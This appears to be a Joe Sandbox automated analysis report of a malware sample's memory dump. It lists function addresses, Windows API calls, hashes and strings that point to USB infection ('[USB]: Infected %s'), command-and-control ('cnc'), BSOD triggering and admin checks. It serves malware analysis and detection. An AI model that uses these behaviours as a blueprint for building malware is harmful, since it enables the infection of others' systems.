                                                                  • Opcode ID: 37f44b5027501741385ccb806256ed2f3fefb38ec55eb283ea5d5bccbe4e8dcd
                                                                  • Instruction ID: c4da85a2bd23f508bb960595dd93d31b869bea1dab3f4a657cb9148e8baabe72
                                                                  • Opcode Fuzzy Hash: 37f44b5027501741385ccb806256ed2f3fefb38ec55eb283ea5d5bccbe4e8dcd
                                                                  • Instruction Fuzzy Hash: 8521F3B2600204ABD722EB45FC82FAB77ADEB84754F11451AF9044B381F7B5ED50C6A2
                                                                  Function 003D1C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 003D1C6E
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003D1CC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D1CD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseFileModuleWrite
                                                                  • String ID: CreateFileW$kernel32.dll
                                                                  • API String ID: 2352564674-2113957990
                                                                  • Opcode ID: a01d63154a453da458be588542e40305e16d35d705be4c740e47213fac1e9841
                                                                  • Instruction ID: e87756ae425e260559b957e36cab693cb03bf4f2649c326e13d4d92f061e6520
                                                                  • Opcode Fuzzy Hash: a01d63154a453da458be588542e40305e16d35d705be4c740e47213fac1e9841
                                                                  • Instruction Fuzzy Hash: 0C0104B26502187FD7159FA9AC86FEF336DAB49324F158319FA15973C0E2705D0543A0
                                                                  Function 003D6D90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,003D6C55,00000000), ref: 003D6DA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: NtQueryInformationProcess$NtSetInformationProcess$Ul=$ntdll.dll
                                                                  • API String ID: 4139908857-2226115229
                                                                  • Opcode ID: 37bfbb09b333d5dc2aab79b844675fd979570d4566211817a90d6005e6c2c298
                                                                  • Instruction ID: 2e6476766fd6c5a67c2ddb4e3e68555a0b9425335b992cba5fbfe92cc2288f14
                                                                  • Opcode Fuzzy Hash: 37bfbb09b333d5dc2aab79b844675fd979570d4566211817a90d6005e6c2c298
                                                                  • Instruction Fuzzy Hash: C601887374176837EB225659AC46FEA739CCB86769F010257FE08AB380DAB19D0042E1
                                                                  Function 003DFAA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 003DFAC0
                                                                  • sprintf.MSVCRT(?,%c:\,?,?), ref: 003DFAF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ProcWindowsprintf
                                                                  • String ID: %c:\$@W>$[USB]: Infected %s
                                                                  • API String ID: 3179433310-1980713265
                                                                  • Opcode ID: de4cb217f911267c07fbdb6c424aa604e6b5708369432234cf094d5b46a92848
                                                                  • Instruction ID: 154fb0dfbf760bc08cfb8e0ca589042193a609edd30685933fec8f70c9584993
                                                                  • Opcode Fuzzy Hash: de4cb217f911267c07fbdb6c424aa604e6b5708369432234cf094d5b46a92848
                                                                  • Instruction Fuzzy Hash: E011CAB75001485FC721DF74EC91EBB737DEB44308F04866AFE069A342E631D9518B65
                                                                  Function 003DD530 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 121sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DD5E4
                                                                    • Part of subcall function 003D8F50: ApplyControlToken.SECUR32(?,?), ref: 003D8FB5
                                                                    • Part of subcall function 003D8F50: InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D8FF9
                                                                    • Part of subcall function 003D8F50: DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D9025
                                                                    • Part of subcall function 003D8F50: FreeCredentialsHandle.SECUR32(?), ref: 003D902F
                                                                  • Sleep.KERNEL32(0000000F), ref: 003DD659
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ContextSecuritySleep$ApplyControlCredentialsDeleteFreeHandleInitializeToken
                                                                  • String ID: %s:%d$cnc$V>
                                                                  • API String ID: 3241915987-1760554709
                                                                  • Opcode ID: 1027fa1f3a627bd8ef692701608cd9e2675db4915c29c4c3c612866076e38c04
                                                                  • Instruction ID: 6459a008c5311a5df8482184d536385244e7266b88598dba91a73554dcaec20a
                                                                  • Opcode Fuzzy Hash: 1027fa1f3a627bd8ef692701608cd9e2675db4915c29c4c3c612866076e38c04
                                                                  • Instruction Fuzzy Hash: 9C41B6B6E00104EBC712DBA9FCC19AEB3BDEB84314F554666F909DB345D631ED4087A1
                                                                  Function 003D16F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strstr.MSVCRT(?,003E13D8), ref: 003D170E
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 003D1754
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003D1764
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strstr$lstrcmp
                                                                  • String ID: bdns$block
                                                                  • API String ID: 142677638-4143068083
                                                                  • Opcode ID: 098e1908b82a734e3652534f3fe9ff77ce8e7adfd49e450af2b963b352aad5cd
                                                                  • Instruction ID: 76e5064a96464453f375a9fcb4f18ec154fcc4aa391218a038ceb4957787a237
                                                                  • Opcode Fuzzy Hash: 098e1908b82a734e3652534f3fe9ff77ce8e7adfd49e450af2b963b352aad5cd
                                                                  • Instruction Fuzzy Hash: D621C1B6601218BB9B22DE59BC86DBB736CDB98711F04422AFC0197381E770ED1196B1
                                                                  Function 003D7E20 Relevance: 7.6, APIs: 5, Instructions: 65networkmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103A), ref: 003D7E2C
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003D7E63
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D7E7A
                                                                  • connect.WS2_32(?,00000008,00000010), ref: 003D7E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocalconnectioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3721573447-0
                                                                  • Opcode ID: 55df459790f8ee0c5d007b57bdd462bc9d7dd14df00b288c810b0c5cc0c721d1
                                                                  • Instruction ID: 6b6dd9eebb4f2ce327a5cf8e8ead0fecb89f6376a4adf87bf3a33ccc0dd29548
                                                                  • Opcode Fuzzy Hash: 55df459790f8ee0c5d007b57bdd462bc9d7dd14df00b288c810b0c5cc0c721d1
                                                                  • Instruction Fuzzy Hash: 8F112931A00714AFC721DF69D849ED6B7A8DF49720F00079AF9599B3D1D2B19C848790
                                                                  Function 003DE770 Relevance: 7.6, APIs: 5, Instructions: 50registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 003DE77C
                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000012,?), ref: 003DE793
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 003DE7B5
                                                                  • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,00000004,00000000,00000000), ref: 003DE7C3
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003DE7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ChangeCloseNotifyOpenlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2592630252-0
                                                                  • Opcode ID: 9b6c5b5f3c7063ed94ca6289b6774207238d01a114866b0c3414f4323c08b7af
                                                                  • Instruction ID: dd74658639e5e8f977568a1b7dbbd769c0a2bf1c2c1903ab1769ee2fe59a25a5
                                                                  • Opcode Fuzzy Hash: 9b6c5b5f3c7063ed94ca6289b6774207238d01a114866b0c3414f4323c08b7af
                                                                  • Instruction Fuzzy Hash: E5011A75340344BFE730DB65DC89F977BACEB88B50F108519BA499B2C0D670E8408B60
                                                                  Function 003D7700 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 46stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                  • _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                    • Part of subcall function 003D4900: WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                    • Part of subcall function 003D4900: ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • lstrcmpA.KERNEL32(00000000,003E1A30), ref: 003D777F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWait_snprintflstrcmplstrlenmemset
                                                                  • String ID: state_%s
                                                                  • API String ID: 1716770999-3670522127
                                                                  • Opcode ID: 3dc047f0c122497248d62afd6133ae49dafe62d1829e1c3da6a2ac4d586f06a6
                                                                  • Instruction ID: 31c3f54f4fff1c7080410d8b9a306fa3f77f821215ee00cc0d69d873ed92cb1f
                                                                  • Opcode Fuzzy Hash: 3dc047f0c122497248d62afd6133ae49dafe62d1829e1c3da6a2ac4d586f06a6
                                                                  • Instruction Fuzzy Hash: 030126B69503586ADB21EAA0DD0BFF973AC8B44700F0046E5FA18E61C2F6B06A448A90
                                                                  Function 003D50F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s-comm,00407AE8), ref: 003D510F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 003D5122
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003D512B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-comm
                                                                  • API String ID: 3057366584-1028030816
                                                                  • Opcode ID: 9916b393eab39adcd0a7edaace8d62d6ca61503d76f16c2f07b53934d20b2372
                                                                  • Instruction ID: 3dc124d0faa8228b31b42f0f6cf50e92a7b0d95cf7d9dd465a32c03b3641fa0d
                                                                  • Opcode Fuzzy Hash: 9916b393eab39adcd0a7edaace8d62d6ca61503d76f16c2f07b53934d20b2372
                                                                  • Instruction Fuzzy Hash: A7214D76A802047BD715DB90EC42FEB3338A784701F044AA6F404672C1E7B8DF94CBA5
                                                                  Function 003D5070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s-pid,00407AE8), ref: 003D508F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 003D50A2
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003D50AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-pid
                                                                  • API String ID: 3057366584-2694366501
                                                                  • Opcode ID: f2246012bf2935fedd4217bb138b6bed28ab41ac66051b45e6731164bcb4ced6
                                                                  • Instruction ID: 348d16ab7a04935afc6df9d3ec8ab4bcdec5a3975b7afb5e632f2eb56e87ae18
                                                                  • Opcode Fuzzy Hash: f2246012bf2935fedd4217bb138b6bed28ab41ac66051b45e6731164bcb4ced6
                                                                  • Instruction Fuzzy Hash: CCF0E9B2A4424467EB21E770AC8BF96325C9710711F500767F614B62C0E9F599C486A6
                                                                  Function 003DD760 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  • Sleep.KERNEL32(00001388), ref: 003DD78A
                                                                  • Sleep.KERNEL32(00002710), ref: 003DD795
                                                                  • ExitProcess.KERNEL32 ref: 003DD799
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExitProcess_snprintflstrlenmemset
                                                                  • String ID: bsod
                                                                  • API String ID: 706155222-1315366068
                                                                  • Opcode ID: 04e6a2021b50c2573891f2fee505241d04cec8b68ada6edf30b64157e0f88aed
                                                                  • Instruction ID: 0b298bebafb495438317dbb8095fd133397398f08a3726b65a6db5090b36a4c9
                                                                  • Opcode Fuzzy Hash: 04e6a2021b50c2573891f2fee505241d04cec8b68ada6edf30b64157e0f88aed
                                                                  • Instruction Fuzzy Hash: 07D097738C427073C23323352C0AF8B28389F40F21F020341F905AF2C085E02C8180E2
                                                                  Function 003DE840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D760,00000000,00000000,00000000), ref: 003DE861
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DE868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CloseCreateHandleThread_snprintf_vsnprintfmemset
                                                                  • String ID: admin$isadmin
                                                                  • API String ID: 3136305548-1977506819
                                                                  • Opcode ID: 8d427f19ec4bf309b6b6e2848fad67793b8194d4e5b4b6e90ce3f87d3742e7d1
                                                                  • Instruction ID: 8ca3d8bb889443fafefec06c2b5a6d122c5eaba09cd5af9cc051cccd970d46ff
                                                                  • Opcode Fuzzy Hash: 8d427f19ec4bf309b6b6e2848fad67793b8194d4e5b4b6e90ce3f87d3742e7d1
                                                                  • Instruction Fuzzy Hash: 3CD0127ABC438076F67227A0AD4FF4A226C2B24F07F644621FB00BD2C1E9F0304049B9
                                                                  Function 003D2880 Relevance: 6.2, APIs: 4, Instructions: 164networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                  • inet_addr.WS2_32(?), ref: 003D28BE
                                                                  • DnsQuery_A.DNSAPI(?,00000001,00000008,00000000,?,00000000), ref: 003D2939
                                                                  • _stricmp.MSVCRT(?,?,?), ref: 003D294E
                                                                  • DnsFree.DNSAPI(?,00000001), ref: 003D29D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeProcessQuery__stricmpinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3002912770-0
                                                                  • Opcode ID: 110f96b6d1d035b685377ec64160652de67e228f322d3c32d59a017b7326408f
                                                                  • Instruction ID: 38759212033da1131396e0bc97618a6a14ba2914d062587d9e048300738c332c
                                                                  • Opcode Fuzzy Hash: 110f96b6d1d035b685377ec64160652de67e228f322d3c32d59a017b7326408f
                                                                  • Instruction Fuzzy Hash: 035103726002009FD722DF59E881B6BB3B5FFA6704F21446AE9859F384E771ED50CB90
                                                                  Function 003D8F50 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ApplyControlToken.SECUR32(?,?), ref: 003D8FB5
                                                                  • InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D8FF9
                                                                  • DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D9025
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 003D902F
                                                                    • Part of subcall function 003D8760: FreeContextBuffer.SECUR32(?), ref: 003D8774
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Context$FreeSecurity$ApplyBufferControlCredentialsDeleteHandleInitializeToken
                                                                  • String ID:
                                                                  • API String ID: 362823901-0
                                                                  • Opcode ID: 91d4cefd64efd9f35dc6e2e7fd71609d68d9713618f1c362d00826a8ab29d2d4
                                                                  • Instruction ID: 222deea4a56d929cc604ac231cf9f6bd835c40099294d239dd0bdff599dad9c0
                                                                  • Opcode Fuzzy Hash: 91d4cefd64efd9f35dc6e2e7fd71609d68d9713618f1c362d00826a8ab29d2d4
                                                                  • Instruction Fuzzy Hash: B041E6B2C002099BCB11DFAAD885AEFFBFCFF98304F10450BE515A7251D7B5A6448BA4
                                                                  Function 003D4900 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                  • ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • ReleaseMutex.KERNEL32(-0000FFFF,?,003D7495), ref: 003D49A5
                                                                  • ReleaseMutex.KERNEL32(003D7495,?,003D7495), ref: 003D49D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 03e03d00c55c86e3f08346e64624f755b73eb8a02ef0a04b17bfb35947deb553
                                                                  • Instruction ID: 774879b5502882f7cb829546dfa968b50194a7cd457289049b977c40c496e372
                                                                  • Opcode Fuzzy Hash: 03e03d00c55c86e3f08346e64624f755b73eb8a02ef0a04b17bfb35947deb553
                                                                  • Instruction Fuzzy Hash: A82121332012468BDB229F66F9A47A777A9EF44364F1A4527E598CB350E730DC51C790
                                                                  Function 003D49F0 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003D73CC,00407C98,00000000,00000000,00000010,00000000), ref: 003D4A10
                                                                  • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 003D4A77
                                                                  • ReleaseMutex.KERNEL32(?,?,?,00000000), ref: 003D4AA9
                                                                  • ReleaseMutex.KERNEL32(?,00000000), ref: 003D4ABC
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 19fae008c1d3355fe06379dd5b4b9c663b7e8060e0388ea700377eb7147b0f7b
                                                                  • Instruction ID: ffd71d4d8e88c3e0ef103f4179a7afded8208467eeb158add89af63ab9ec34cf
                                                                  • Opcode Fuzzy Hash: 19fae008c1d3355fe06379dd5b4b9c663b7e8060e0388ea700377eb7147b0f7b
                                                                  • Instruction Fuzzy Hash: 9021A3772042155BDB12DF69FC806AA73ADAF80764B19452BFC48CB350EB30DD4187E4
                                                                  Function 003DD6B0 Relevance: 6.1, APIs: 4, Instructions: 74registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 003DD6FD
                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 003DD731
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003DD740
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003DD753
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Close$CreateValue
                                                                  • String ID:
                                                                  • API String ID: 1009429713-0
                                                                  • Opcode ID: aa0ebcf9023b687313e33f4e6f6419e67bf2bbed339c76ea2d3e5b6e8402217e
                                                                  • Instruction ID: 8d84dfb25035b07c8a8c8f4df5c59c23d8f27cbee781d791d215bb64bc00250d
                                                                  • Opcode Fuzzy Hash: aa0ebcf9023b687313e33f4e6f6419e67bf2bbed339c76ea2d3e5b6e8402217e
                                                                  • Instruction Fuzzy Hash: 13211D75640209BBDB25CF94DC86FAA737CEB88B44F108244BA05AB285E670FE4497A4
                                                                  Function 003D7EF0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLocal$closesocket
                                                                  • String ID:
                                                                  • API String ID: 1824021853-0
                                                                  • Opcode ID: 811a052fccb4a2c7277ff8bf255115bb4af3e452b279823391bdb9bb3d32fc52
                                                                  • Instruction ID: 547f32737c9eabcfc03f7655997c600c7525a5753d0ba4d0d4971eb174e2db3e
                                                                  • Opcode Fuzzy Hash: 811a052fccb4a2c7277ff8bf255115bb4af3e452b279823391bdb9bb3d32fc52
                                                                  • Instruction Fuzzy Hash: FE015A327042109FC722DF69E88489AB3ADFF8976535504AAF548CB310D631EC81CBA0
                                                                  Function 003DA800 Relevance: 6.0, APIs: 4, Instructions: 49stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: 95a916ab21c3a4c5f4ade448bca9315db80dd00b46d0f3afbf11dcd3c558da99
                                                                  • Instruction ID: 3751e54321707f846cc19ed66b4f70999004c602f770b3dd7b4a62d543db51da
                                                                  • Opcode Fuzzy Hash: 95a916ab21c3a4c5f4ade448bca9315db80dd00b46d0f3afbf11dcd3c558da99
                                                                  • Instruction Fuzzy Hash: 83F044B72002805BD312A3A4EC86A8A735ACBC4361F000426FE098B341E9B9DE4642B3
                                                                  Function 003DA790 Relevance: 6.0, APIs: 4, Instructions: 44stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: d5175d9d15ba25bc79b7949ee6de8b6821be008fae62708455ee3cb17fb9c87f
                                                                  • Instruction ID: 077423d258067dd62eb5ef008f9d34a365832d691d0c23cee1c6ffa72f48e2e6
                                                                  • Opcode Fuzzy Hash: d5175d9d15ba25bc79b7949ee6de8b6821be008fae62708455ee3cb17fb9c87f
                                                                  • Instruction Fuzzy Hash: 88F02B7350116267C23363A5FC86A8BB79CDB81761F050662FE059F342E56C9E8581F2
                                                                  Function 003DA080 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 003DA0A2
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 003DA0C0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DA0CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DA0D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateWrite
                                                                  • String ID:
                                                                  • API String ID: 3602564925-0
